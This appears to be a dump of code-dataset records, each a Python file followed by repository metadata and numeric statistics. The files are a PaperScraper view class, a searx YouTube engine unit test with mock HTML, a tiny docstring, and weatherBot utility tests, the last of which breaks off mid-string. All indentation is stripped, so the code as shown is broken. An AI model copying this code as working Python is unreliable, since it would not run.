:param message: message to show the user
"""
print(message)
def get_input(self, prompt: str, field = None) -> str:
"""
Gets user input
NOTE: DO NOT USE FOR SENSITIVE DATA! For sensitive data such as passwords,
use get_password instead!
:param prompt: prompt to show the user
:param field: (not used)
:return: user input
:raise ValueError:
"""
if field is not None:
raise ValueError("No value should be passed for field!")
return input(prompt)
def get_password(self, prompt: str) -> str:
return getpass(prompt)
class FlaskWebView(View):
"""
Class representing a way to interact with PaperScraper through a Flask website
"""
def print_message(self, message: Any):
"""
Shows output to the user
:param message: message to show the user
"""
#TODO
str(message)
def get_input(self, prompt: str, field: str) -> str:
"""
Gets user input
NOTE: DO NOT USE FOR SENSITIVE DATA! For sensitive data such as passwords,
use get_password instead!
:param prompt: prompt to show the user
:param field: the field from which to retrieve user input
:return: user input
"""
#TODO
def get_password(self, prompt: str) -> str:
"""
Gets sensitive user input, such as a password, in a secure way
:param prompt: prompt to show the user
:return: user input
"""
#TODO | 26.114286 | 95 | 0.591539 | 345 | 2,742 | 4.657971 | 0.205797 | 0.067206 | 0.044804 | 0.064717 | 0.769757 | 0.769757 | 0.769757 | 0.724953 | 0.698195 | 0.698195 | 0 | 0 | 0.330416 | 2,742 | 105 | 96 | 26.114286 | 0.875272 | 0.505835 | 0 | 0.318182 | 0 | 0 | 0.038298 | 0 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0.454545 | false | 0.272727 | 0.090909 | 0.090909 | 0.818182 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
41dcbb7492b088c9715a77f357f51c8526b5e363 | 8,341 | py | Python | Toolkits/Discovery/meta/searx/tests/unit/engines/test_youtube_noapi.py | roscopecoltran/SniperKit-Core | 4600dffe1cddff438b948b6c22f586d052971e04 | [
"MIT"
] | 4 | 2018-09-07T15:35:24.000Z | 2019-03-27T09:48:12.000Z | Toolkits/Discovery/meta/searx/tests/unit/engines/test_youtube_noapi.py | roscopecoltran/SniperKit-Core | 4600dffe1cddff438b948b6c22f586d052971e04 | [
"MIT"
] | 371 | 2020-03-04T21:51:56.000Z | 2022-03-31T20:59:11.000Z | Toolkits/Discovery/meta/searx/tests/unit/engines/test_youtube_noapi.py | roscopecoltran/SniperKit-Core | 4600dffe1cddff438b948b6c22f586d052971e04 | [
"MIT"
] | 3 | 2019-06-18T19:57:17.000Z | 2020-11-06T03:55:08.000Z | # -*- coding: utf-8 -*-
from collections import defaultdict
import mock
from searx.engines import youtube_noapi
from searx.testing import SearxTestCase
class TestYoutubeNoAPIEngine(SearxTestCase):
def test_request(self):
query = 'test_query'
dicto = defaultdict(dict)
dicto['pageno'] = 0
dicto['time_range'] = ''
params = youtube_noapi.request(query, dicto)
self.assertIn('url', params)
self.assertIn(query, params['url'])
self.assertIn('youtube.com', params['url'])
def test_time_range_search(self):
dicto = defaultdict(dict)
query = 'test_query'
dicto['time_range'] = 'year'
params = youtube_noapi.request(query, dicto)
self.assertIn('&sp=EgIIBQ%253D%253D', params['url'])
dicto['time_range'] = 'month'
params = youtube_noapi.request(query, dicto)
self.assertIn('&sp=EgIIBA%253D%253D', params['url'])
dicto['time_range'] = 'week'
params = youtube_noapi.request(query, dicto)
self.assertIn('&sp=EgIIAw%253D%253D', params['url'])
dicto['time_range'] = 'day'
params = youtube_noapi.request(query, dicto)
self.assertIn('&sp=EgIIAg%253D%253D', params['url'])
def test_response(self):
self.assertRaises(AttributeError, youtube_noapi.response, None)
self.assertRaises(AttributeError, youtube_noapi.response, [])
self.assertRaises(AttributeError, youtube_noapi.response, '')
self.assertRaises(AttributeError, youtube_noapi.response, '[]')
response = mock.Mock(text='<html></html>')
self.assertEqual(youtube_noapi.response(response), [])
html = """
<ol id="item-section-063864" class="item-section">
<li>
<div class="yt-lockup yt-lockup-tile yt-lockup-video vve-check clearfix yt-uix-tile"
data-context-item-id="DIVZCPfAOeM"
data-visibility-tracking="CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JECx_-GK5uqMpcIB">
<div class="yt-lockup-dismissable"><div class="yt-lockup-thumbnail contains-addto">
<a aria-hidden="true" href="/watch?v=DIVZCPfAOeM" class=" yt-uix-sessionlink pf-link"
data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JFIEdGVzdA">
<div class="yt-thumb video-thumb"><img src="//i.ytimg.com/vi/DIVZCPfAOeM/mqdefault.jpg"
width="196" height="110"/></div><span class="video-time" aria-hidden="true">11:35</span></a>
<span class="thumb-menu dark-overflow-action-menu video-actions">
</span>
</div>
<div class="yt-lockup-content">
<h3 class="yt-lockup-title">
<a href="/watch?v=DIVZCPfAOeM"
class="yt-uix-tile-link yt-ui-ellipsis yt-ui-ellipsis-2 yt-uix-sessionlink spf-link"
data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JFIEdGVzdA"
title="Top Speed Test Kawasaki Ninja H2 (Thailand) By. MEHAY SUPERBIKE"
aria-describedby="description-id-259079" rel="spf-prefetch" dir="ltr">
Title
</a>
<span class="accessible-description" id="description-id-259079"> - Durée : 11:35.</span>
</h3>
<div class="yt-lockup-byline">de
<a href="/user/mheejapan" class=" yt-uix-sessionlink spf-link g-hovercard"
data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JA" data-ytid="UCzEesu54Hjs0uRKmpy66qeA"
data-name="">MEHAY SUPERBIKE</a></div><div class="yt-lockup-meta">
<ul class="yt-lockup-meta-info">
<li>il y a 20 heures</li>
<li>8 424 vues</li>
</ul>
</div>
<div class="yt-lockup-description yt-ui-ellipsis yt-ui-ellipsis-2" dir="ltr">
Description
</div>
<div class="yt-lockup-badges">
<ul class="yt-badge-list ">
<li class="yt-badge-item" >
<span class="yt-badge">Nouveauté</span>
</li>
<li class="yt-badge-item" ><span class="yt-badge " >HD</span></li>
</ul>
</div>
<div class="yt-lockup-action-menu yt-uix-menu-container">
<div class="yt-uix-menu yt-uix-videoactionmenu hide-until-delayloaded"
data-video-id="DIVZCPfAOeM" data-menu-content-id="yt-uix-videoactionmenu-menu">
</div>
</div>
</div>
</div>
</div>
</li>
</ol>
"""
response = mock.Mock(text=html)
results = youtube_noapi.response(response)
self.assertEqual(type(results), list)
self.assertEqual(len(results), 1)
self.assertEqual(results[0]['title'], 'Title')
self.assertEqual(results[0]['url'], 'https://www.youtube.com/watch?v=DIVZCPfAOeM')
self.assertEqual(results[0]['content'], 'Description')
self.assertEqual(results[0]['thumbnail'], 'https://i.ytimg.com/vi/DIVZCPfAOeM/hqdefault.jpg')
self.assertTrue('DIVZCPfAOeM' in results[0]['embedded'])
html = """
<ol id="item-section-063864" class="item-section">
<li>
<div class="yt-lockup yt-lockup-tile yt-lockup-video vve-check clearfix yt-uix-tile"
data-context-item-id="DIVZCPfAOeM"
data-visibility-tracking="CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JECx_-GK5uqMpcIB">
<div class="yt-lockup-dismissable"><div class="yt-lockup-thumbnail contains-addto">
<a aria-hidden="true" href="/watch?v=DIVZCPfAOeM" class=" yt-uix-sessionlink pf-link"
data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JFIEdGVzdA">
<div class="yt-thumb video-thumb"><img src="//i.ytimg.com/vi/DIVZCPfAOeM/mqdefault.jpg"
width="196" height="110"/></div><span class="video-time" aria-hidden="true">11:35</span></a>
<span class="thumb-menu dark-overflow-action-menu video-actions">
</span>
</div>
<div class="yt-lockup-content">
<h3 class="yt-lockup-title">
<span class="accessible-description" id="description-id-259079"> - Durée : 11:35.</span>
</h3>
<div class="yt-lockup-byline">de
<a href="/user/mheejapan" class=" yt-uix-sessionlink spf-link g-hovercard"
data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JA" data-ytid="UCzEesu54Hjs0uRKmpy66qeA"
data-name="">MEHAY SUPERBIKE</a></div><div class="yt-lockup-meta">
<ul class="yt-lockup-meta-info">
<li>il y a 20 heures</li>
<li>8 424 vues</li>
</ul>
</div>
<div class="yt-lockup-badges">
<ul class="yt-badge-list ">
<li class="yt-badge-item" >
<span class="yt-badge">Nouveauté</span>
</li>
<li class="yt-badge-item" ><span class="yt-badge " >HD</span></li>
</ul>
</div>
<div class="yt-lockup-action-menu yt-uix-menu-container">
<div class="yt-uix-menu yt-uix-videoactionmenu hide-until-delayloaded"
data-video-id="DIVZCPfAOeM" data-menu-content-id="yt-uix-videoactionmenu-menu">
</div>
</div>
</div>
</div>
</div>
</li>
</ol>
"""
response = mock.Mock(text=html)
results = youtube_noapi.response(response)
self.assertEqual(type(results), list)
self.assertEqual(len(results), 1)
html = """
<ol id="item-section-063864" class="item-section">
<li>
</li>
</ol>
"""
response = mock.Mock(text=html)
results = youtube_noapi.response(response)
self.assertEqual(type(results), list)
self.assertEqual(len(results), 0)
| 47.662857 | 119 | 0.559765 | 901 | 8,341 | 5.150943 | 0.190899 | 0.060332 | 0.045249 | 0.058608 | 0.808877 | 0.794872 | 0.768584 | 0.731092 | 0.720965 | 0.678733 | 0 | 0.025528 | 0.295528 | 8,341 | 174 | 120 | 47.936782 | 0.764295 | 0.002518 | 0 | 0.73913 | 0 | 0.124224 | 0.727579 | 0.284323 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.018634 | false | 0 | 0.024845 | 0 | 0.049689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
511c39db0eef89b9c475e19bd2c4a726f3ca0aa6 | 81 | py | Python | Python/Reals/broom_broom/given_list_return_this.py | Mr-Perfection/coding_practice | 41df85292a151eef3266b01545124aeb4e831286 | [
"Unlicense"
] | null | null | null | Python/Reals/broom_broom/given_list_return_this.py | Mr-Perfection/coding_practice | 41df85292a151eef3266b01545124aeb4e831286 | [
"Unlicense"
] | null | null | null | Python/Reals/broom_broom/given_list_return_this.py | Mr-Perfection/coding_practice | 41df85292a151eef3266b01545124aeb4e831286 | [
"Unlicense"
] | null | null | null | """
given the array [2,3,4,6,8, 10,11,] return this: 12-4,6,8,10-11î
what...
"""
| 16.2 | 64 | 0.567901 | 19 | 81 | 2.421053 | 0.789474 | 0.086957 | 0.130435 | 0.217391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.257143 | 0.135802 | 81 | 4 | 65 | 20.25 | 0.4 | 0.888889 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5af1f2f499ce0b10ff1060fcd17f46613385fbcb | 120,144 | py | Python | test.py | lpreimesberger/weatherBot | 5e606524525818c963cc6c9918f9c15c54ff62fd | [
"MIT"
] | null | null | null | test.py | lpreimesberger/weatherBot | 5e606524525818c963cc6c9918f9c15c54ff62fd | [
"MIT"
] | null | null | null | test.py | lpreimesberger/weatherBot | 5e606524525818c963cc6c9918f9c15c54ff62fd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# weatherBot tests
# Copyright 2015-2016 Brian Mitchell under the MIT license
# See the GitHub repository: https://github.com/bman4789/weatherBot
import unittest
import sys
import logging
import os
import random
import tweepy
import forecastio
import pytz
import datetime
import configparser
from testfixtures import LogCapture
import weatherBot
import keys
import strings
import utils
# TODO write tests
class TestUtils(unittest.TestCase):
def test_centerpoint(self):
"""Testing finding a centerpoint from a bounding box of locations"""
box = [[-93.207783, 44.89076], [-93.003514, 44.89076], [-93.003514, 44.992279], [-93.207783, 44.992279]]
average = utils.centerpoint(box)
self.assertEqual(average[0], 44.9415195)
self.assertEqual(average[1], -93.1056485)
def test_get_wind_direction(self):
"""Testing if wind direction conversions are successful"""
self.assertEqual(utils.get_wind_direction(0), 'N')
self.assertEqual(utils.get_wind_direction(338), 'N')
self.assertEqual(utils.get_wind_direction(65), 'NE')
self.assertEqual(utils.get_wind_direction(110), 'E')
self.assertEqual(utils.get_wind_direction(150), 'SE')
self.assertEqual(utils.get_wind_direction(200), 'S')
self.assertEqual(utils.get_wind_direction(240), 'SW')
self.assertEqual(utils.get_wind_direction(290), 'W')
self.assertEqual(utils.get_wind_direction(330), 'NW')
self.assertEqual(utils.get_wind_direction(400), 'N')
self.assertEqual(utils.get_wind_direction(-4), 'N')
self.assertEqual(utils.get_wind_direction('five'), '')
def test_get_units(self):
"""Testing getting units from a country/unit identifier"""
self.assertEqual(utils.get_units('us')['unit'], 'us')
self.assertEqual(utils.get_units('us')['nearestStormDistance'], 'mph')
self.assertEqual(utils.get_units('us')['precipIntensity'], 'in/h')
self.assertEqual(utils.get_units('us')['precipIntensityMax'], 'in/h')
self.assertEqual(utils.get_units('us')['precipAccumulation'], 'in')
self.assertEqual(utils.get_units('us')['temperature'], 'F')
self.assertEqual(utils.get_units('us')['temperatureMin'], 'F')
self.assertEqual(utils.get_units('us')['temperatureMax'], 'F')
self.assertEqual(utils.get_units('us')['apparentTemperature'], 'F')
self.assertEqual(utils.get_units('us')['dewPoint'], 'F')
self.assertEqual(utils.get_units('us')['windSpeed'], 'mph')
self.assertEqual(utils.get_units('us')['pressure'], 'mb')
self.assertEqual(utils.get_units('us')['visibility'], 'mi')
self.assertEqual(utils.get_units('ca')['unit'], 'ca')
self.assertEqual(utils.get_units('ca')['nearestStormDistance'], 'km')
self.assertEqual(utils.get_units('ca')['precipIntensity'], 'mm/h')
self.assertEqual(utils.get_units('ca')['precipIntensityMax'], 'mm/h')
self.assertEqual(utils.get_units('ca')['precipAccumulation'], 'cm')
self.assertEqual(utils.get_units('ca')['temperature'], 'C')
self.assertEqual(utils.get_units('ca')['temperatureMin'], 'C')
self.assertEqual(utils.get_units('ca')['temperatureMax'], 'C')
self.assertEqual(utils.get_units('ca')['apparentTemperature'], 'C')
self.assertEqual(utils.get_units('ca')['dewPoint'], 'C')
self.assertEqual(utils.get_units('ca')['windSpeed'], 'km/h')
self.assertEqual(utils.get_units('ca')['pressure'], 'hPa')
self.assertEqual(utils.get_units('ca')['visibility'], 'km')
self.assertEqual(utils.get_units('uk2')['unit'], 'uk2')
self.assertEqual(utils.get_units('uk2')['nearestStormDistance'], 'mi')
self.assertEqual(utils.get_units('uk2')['precipIntensity'], 'mm/h')
self.assertEqual(utils.get_units('uk2')['precipIntensityMax'], 'mm/h')
self.assertEqual(utils.get_units('uk2')['precipAccumulation'], 'cm')
self.assertEqual(utils.get_units('uk2')['temperature'], 'C')
self.assertEqual(utils.get_units('uk2')['temperatureMin'], 'C')
self.assertEqual(utils.get_units('uk2')['temperatureMax'], 'C')
self.assertEqual(utils.get_units('uk2')['apparentTemperature'], 'C')
self.assertEqual(utils.get_units('uk2')['dewPoint'], 'C')
self.assertEqual(utils.get_units('uk2')['windSpeed'], 'mph')
self.assertEqual(utils.get_units('uk2')['pressure'], 'hPa')
self.assertEqual(utils.get_units('uk2')['visibility'], 'mi')
self.assertEqual(utils.get_units('si')['unit'], 'si')
self.assertEqual(utils.get_units('si')['nearestStormDistance'], 'km')
self.assertEqual(utils.get_units('si')['precipIntensity'], 'mm/h')
self.assertEqual(utils.get_units('si')['precipIntensityMax'], 'mm/h')
self.assertEqual(utils.get_units('si')['precipAccumulation'], 'cm')
self.assertEqual(utils.get_units('si')['temperature'], 'C')
self.assertEqual(utils.get_units('si')['temperatureMin'], 'C')
self.assertEqual(utils.get_units('si')['temperatureMax'], 'C')
self.assertEqual(utils.get_units('si')['apparentTemperature'], 'C')
self.assertEqual(utils.get_units('si')['dewPoint'], 'C')
self.assertEqual(utils.get_units('si')['windSpeed'], 'm/s')
self.assertEqual(utils.get_units('si')['pressure'], 'hPa')
self.assertEqual(utils.get_units('si')['visibility'], 'km')
def test_precipitation_intensity(self):
"""Testing getting string description from precipitation intensity"""
self.assertEqual(utils.precipitation_intensity(0.00, 'in/h'), 'none')
self.assertEqual(utils.precipitation_intensity(0.002, 'in/h'), 'very-light')
self.assertEqual(utils.precipitation_intensity(0.017, 'in/h'), 'light')
self.assertEqual(utils.precipitation_intensity(0.1, 'in/h'), 'moderate')
self.assertEqual(utils.precipitation_intensity(0.4, 'in/h'), 'heavy')
self.assertEqual(utils.precipitation_intensity(0.00, 'mm/h'), 'none')
self.assertEqual(utils.precipitation_intensity(0.051, 'mm/h'), 'very-light')
self.assertEqual(utils.precipitation_intensity(0.432, 'mm/h'), 'light')
self.assertEqual(utils.precipitation_intensity(2.540, 'mm/h'), 'moderate')
self.assertEqual(utils.precipitation_intensity(5.08, 'mm/h'), 'heavy')
def test_get_local_datetime(self):
dt = datetime.datetime.fromtimestamp(1461731335) # datetime.datetime(2016, 4, 26, 23, 28, 55)
timezone_id = 'Europe/Copenhagen'
localized_dt = utils.get_local_datetime(timezone_id, dt)
correct_dt = datetime.datetime.fromtimestamp(1461738535) # datetime.datetime(2016, 4, 27, 1, 28, 55)
self.assertEqual(localized_dt, pytz.timezone('Europe/Copenhagen').localize(correct_dt))
def test_get_utc_datetime(self):
dt = datetime.datetime.fromtimestamp(1461738535) # datetime.datetime(2016, 4, 27, 1, 28, 55)
timezone_id = 'Europe/Copenhagen'
utc_dt = utils.get_utc_datetime(timezone_id, dt)
correct_dt = pytz.timezone('Europe/Copenhagen').localize(dt).astimezone(pytz.utc)
self.assertEqual(utc_dt, correct_dt)
class TestStrings(unittest.TestCase):
def test_get_precipitation(self):
"""Testing if a precipitation condition is met"""
# testing for 'none' with too low of a probability or precipitation type is 'none'
self.assertEqual(strings.get_precipitation(0.3, 0.5, 'rain', utils.get_units('us')), ('none', 'none'))
self.assertEqual(strings.get_precipitation(0.3, 1, 'none', utils.get_units('us')), ('none', 'none'))
self.assertEqual(strings.get_precipitation(0, 1, 'rain', utils.get_units('us')), ('none', 'none'))
self.assertEqual(strings.get_precipitation(0, 1, 'none', utils.get_units('us')), ('none', 'none'))
# testing with a few possible conditions
self.assertEqual(strings.get_precipitation(0.3, 1, 'rain', utils.get_units('us'))[0], 'moderate-rain')
self.assertEqual(strings.get_precipitation(0.4, 0.85, 'snow', utils.get_units('us'))[0], 'heavy-snow')
self.assertEqual(strings.get_precipitation(0.06, 1, 'sleet', utils.get_units('us'))[0], 'light-sleet')
self.assertEqual(strings.get_precipitation(0.005, 1, 'rain', utils.get_units('us'))[0], 'very-light-rain')
class TestWB(unittest.TestCase):
def setUp(self):
self.location = {'lat': 55.76, 'lng': 12.49, 'name': 'Lyngby-Taarbæk, Hovedstaden'}
self.wd_us = {
'windBearing': 'SW',
'temp_and_unit': '44ºF',
'apparentTemperature_and_unit': '38ºF',
'latitude': 55.76,
'units': {
'unit': 'us',
'temperatureMin': 'F',
'pressure': 'mb',
'precipIntensityMax': 'in/h',
'temperatureMax': 'F',
'visibility': 'mi',
'apparentTemperature': 'F',
'dewPoint': 'F',
'precipAccumulation': 'in',
'nearestStormDistance': 'mph',
'precipIntensity': 'in/h',
'windSpeed': 'mph',
'temperature': 'F'
},
'summary': 'mostly cloudy',
'apparentTemperature': 38.35,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '12 mph',
'humidity': 95,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 11.77,
'temp': 44.32,
'icon': 'partly-cloudy-night'
}
self.wd_ca = {
'windBearing': 'SW',
'temp_and_unit': '7ºC',
'apparentTemperature_and_unit': '3ºC',
'latitude': 55.76,
'units': {
'unit': 'ca',
'temperatureMin': 'C',
'pressure': 'hPa',
'precipIntensityMax': 'mm/h',
'temperatureMax': 'C',
'visibility': 'km',
'apparentTemperature': 'C',
'dewPoint': 'C',
'precipAccumulation': 'cm',
'nearestStormDistance': 'km/h',
'precipIntensity': 'mm/h',
'windSpeed': 'km/h',
'temperature': 'C'
},
'summary': 'mostly cloudy',
'apparentTemperature': 3.46,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '19 km/h',
'humidity': 95,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 18.94,
'temp': 6.78,
'icon': 'partly-cloudy-night'
}
self.wd_uk2 = {
'windBearing': 'SW',
'temp_and_unit': '7ºC',
'apparentTemperature_and_unit': '3ºC',
'latitude': 55.76,
'units': {
'unit': 'uk2',
'temperatureMin': 'C',
'pressure': 'hPa',
'precipIntensityMax': 'mm/h',
'temperatureMax': 'C',
'visibility': 'mi',
'apparentTemperature': 'C',
'dewPoint': 'C',
'precipAccumulation': 'cm',
'nearestStormDistance': 'mi',
'precipIntensity': 'mm/h',
'windSpeed': 'mph',
'temperature': 'C'
},
'summary': 'mostly cloudy',
'apparentTemperature': 3.43,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '12 mph',
'humidity': 95,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 11.77,
'temp': 6.76,
'icon': 'partly-cloudy-night'
}
self.wd_si = {
'windBearing': 'SW',
'temp_and_unit': '7ºC',
'apparentTemperature_and_unit': '3ºC',
'latitude': 55.76,
'units': {
'unit': 'si',
'temperatureMin': 'C',
'pressure': 'hPa',
'precipIntensityMax': 'mm/h',
'temperatureMax': 'C',
'visibility': 'km',
'apparentTemperature': 'C',
'dewPoint': 'C',
'precipAccumulation': 'cm',
'nearestStormDistance': 'km/h',
'precipIntensity': 'mm/h',
'windSpeed': 'm/s',
'temperature': 'C'
},
'summary': 'mostly cloudy',
'apparentTemperature': 3.41,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '5 m/s',
'humidity': 94,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 5.26,
'temp': 6.74,
'icon': 'partly-cloudy-night'
}
def test_config(self):
"""Testing config file handling"""
equal = {
'basic': {
'dm_errors': False,
'units': 'si',
'tweet_location': False,
'hashtag': '',
'refresh': 300
},
'default_location': {
'lat': -79,
'lng': 12,
'name': 'Just a Test'
},
'variable_location': {
'enabled': True,
'user': 'test_user'
},
'log': {
'enabled': False,
'log_path': '/tmp/weatherBotTest.log'
},
'throttles': {
'default': 24,
'wind-chill': 23,
'medium-wind': 22,
'heavy-wind': 21,
'fog': 20,
'cold': 19,
'hot': 18,
'dry': 17,
'heavy-rain': 16,
'moderate-rain': 15,
'light-rain': 14,
'very-light-rain': 13,
'heavy-snow': 12,
'moderate-snow': 11,
'light-snow': 10,
'very-light-snow': 9,
'heavy-sleet': 8,
'moderate-sleet': 7,
'light-sleet': 6,
'very-light-sleet': 5,
'heavy-hail': 4,
'moderate-hail': 3,
'light-hail': 2,
'very-light-hail': 1
}
}
conf = configparser.ConfigParser()
conf['basic'] = {
'dm_errors': 'off',
'units': 'si',
'tweet_location': 'no',
'hashtag': '',
'refresh': '300'
}
conf['default location'] = {
'lat': '-79',
'lng': '12',
'name': 'Just a Test'
}
conf['variable location'] = {
'enabled': 'yes',
'user': 'test_user'
}
conf['log'] = {
'enabled': '0',
'log_path': '/tmp/weatherBotTest.log'
}
conf['throttles'] = {
'default': '24',
'wind-chill': '23',
'medium-wind': '22',
'heavy-wind': '21',
'fog': '20',
'cold': '19',
'hot': '18',
'dry': '17',
'heavy-rain': '16',
'moderate-rain': '15',
'light-rain': '14',
'very-light-rain': '13',
'heavy-snow': '12',
'moderate-snow': '11',
'light-snow': '10',
'very-light-snow': '9',
'heavy-sleet': '8',
'moderate-sleet': '7',
'light-sleet': '6',
'very-light-sleet': '5',
'heavy-hail': '4',
'moderate-hail': '3',
'light-hail': '2',
'very-light-hail': '1'
}
with open(os.getcwd() + '/weatherBotTest.conf', 'w') as configfile:
conf.write(configfile)
weatherBot.load_config(os.getcwd() + '/weatherBotTest.conf')
self.assertEqual(weatherBot.CONFIG, equal)
os.remove(os.getcwd() + '/weatherBotTest.conf')
def test_logging(self):
"""Testing if the system version is in the log and log file"""
with LogCapture() as l:
logger = logging.getLogger()
logger.info('info')
weatherBot.initialize_logger(True, os.getcwd() + '/weatherBotTest.log')
logger.debug('debug')
logger.warning('uh oh')
l.check(('root', 'INFO', 'info'), ('root', 'INFO', 'Starting weatherBot with Python ' + sys.version),
('root', 'DEBUG', 'debug'), ('root', 'WARNING', 'uh oh'))
path = os.path.join(os.getcwd(), 'weatherBotTest.log')
with open(path, 'rb') as path:
data = path.read()
self.assertTrue(bytes(sys.version, 'UTF-8') in data)
self.assertFalse(bytes('debug', 'UTF-8') in data)
self.assertTrue(bytes('uh oh', 'UTF-8') in data)
os.remove(os.getcwd() + '/weatherBotTest.log')
def test_get_location_from_user_timeline(self):
"""Testing getting a location from twitter account's recent tweets"""
fallback = {'lat': 55.76, 'lng': 12.49, 'name': 'Lyngby-Taarbæk, Hovedstaden'}
morris = {'lat': 45.585, 'lng': -95.91, 'name': 'Morris, MN'}
loc = weatherBot.get_location_from_user_timeline('MorrisMNWeather', fallback)
self.assertTrue(type(loc) is dict)
self.assertEqual(loc, morris)
self.assertEqual(weatherBot.get_location_from_user_timeline('twitter', fallback), fallback)
def test_get_forecast_object(self):
"""Testing getting the forecastio object"""
forecast = weatherBot.get_forecast_object(self.location['lat'], self.location['lng'], 'us')
self.assertEqual(forecast.response.status_code, 200)
bad_forecast = weatherBot.get_forecast_object(345.5, 123.45, 'us')
self.assertEqual(bad_forecast, None)
# def test_get_normal_weather_variables(self):
# """Testing if weather data fields copied successfully"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# self.assertEqual(weather_data['windSpeed'], 9.0)
# self.assertEqual(weather_data['wind_direction'], 'NW')
# self.assertEqual(weather_data['apparentTemperature'], 37)
# self.assertEqual(weather_data['windSpeed_and_unit'], '9 mph')
# self.assertEqual(weather_data['humidity'], 70)
# self.assertEqual(weather_data['temp'], 43)
# self.assertEqual(weather_data['code'], 33)
# self.assertEqual(weather_data['condition'], 'fair')
# self.assertEqual(weather_data['deg_unit'], deg + 'F')
# self.assertEqual(weather_data['temp_and_unit'], '43' + deg + 'F')
# self.assertEqual(weather_data['city'], 'Morris')
# self.assertEqual(weather_data['region'], 'MN')
# self.assertEqual(weather_data['latitude'], '45.59')
# self.assertEqual(weather_data['longitude'], '-95.9')
# self.assertEqual(weather_data['forecast'], [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}])
# self.assertTrue(weather_data['valid'])
#
# def test_get_empty_weather_variables(self):
# """Testing if variables with a fallback are set correctly"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 